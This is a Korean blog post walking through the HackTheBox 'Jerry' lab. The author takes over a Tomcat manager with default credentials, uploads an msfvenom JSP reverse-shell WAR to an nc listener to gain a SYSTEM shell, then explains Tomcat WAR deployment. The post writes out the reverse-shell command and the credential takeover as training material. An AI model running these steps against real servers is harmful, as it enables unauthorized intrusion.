본문 바로가기
워게임/hackthebox

jerry 롸업 정리(톰캣 배포 이해)

by meanjung 2021. 10. 9.

nmap


삽질

searchsploit -> not vulnerable..

 

admin/admin


nikto scan

엄청 느리다

=> 여기서 /manage/html이 tomcat/s3cret로 뚫린다는 취약점이 나온다.

 

 

 

tomcat/s3cret

 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=1234 -f war > shell.war

nc -nlvp 1234 열어놓고

해당 war 업로드 후 http://10.10.10.95:8080/shell 접속

 

바로 system 권한의 쉘이 따진다.

 


tomcat 웹 애플리케이션 배포

배포할 프로젝트를 war로 추출한다.

war는 web application archive의 약자로 웹 애플리케이션을 배포하기 위한 파일들의 압축

 

war를 tomcat으로 배포하는 방법(두 가지)

1. 톰캣에서 제공하는 /manage/html 페이지에서 설정

=> 방금 jerry를 해결한 방법이며, war 파일을 업로드하고 <ip>:8080/war파일명 으로 접근할 수 있다.

2. 톰캣 경로\conf\server.xml 파일을 통한 webapp 설정

 

출처

https://attibook.tistory.com/240

 

톰캣: 웹 애플리케이션(WAR) 배포

관련 문서 https://tomcat.apache.org/tomcat-8.0-doc/config/context.html https://tomcat.apache.org/tomcat-9.0-doc/config/context.html http://blog.daum.net/naline1213/7592254 테스트 환경 JDK 1.7.0_51 t..

attibook.tistory.com

 

'워게임 > hackthebox' 카테고리의 다른 글

chatterbox 롸업 정리  (1) 2021.10.12
jarvis 롸업 정리  (0) 2021.10.10
silo 롸업 정리(tns listener)  (0) 2021.10.06
grandpa 롸업 정리- 다시해보기  (0) 2021.10.05
arctic 롸업 정리  (0) 2021.10.05

댓글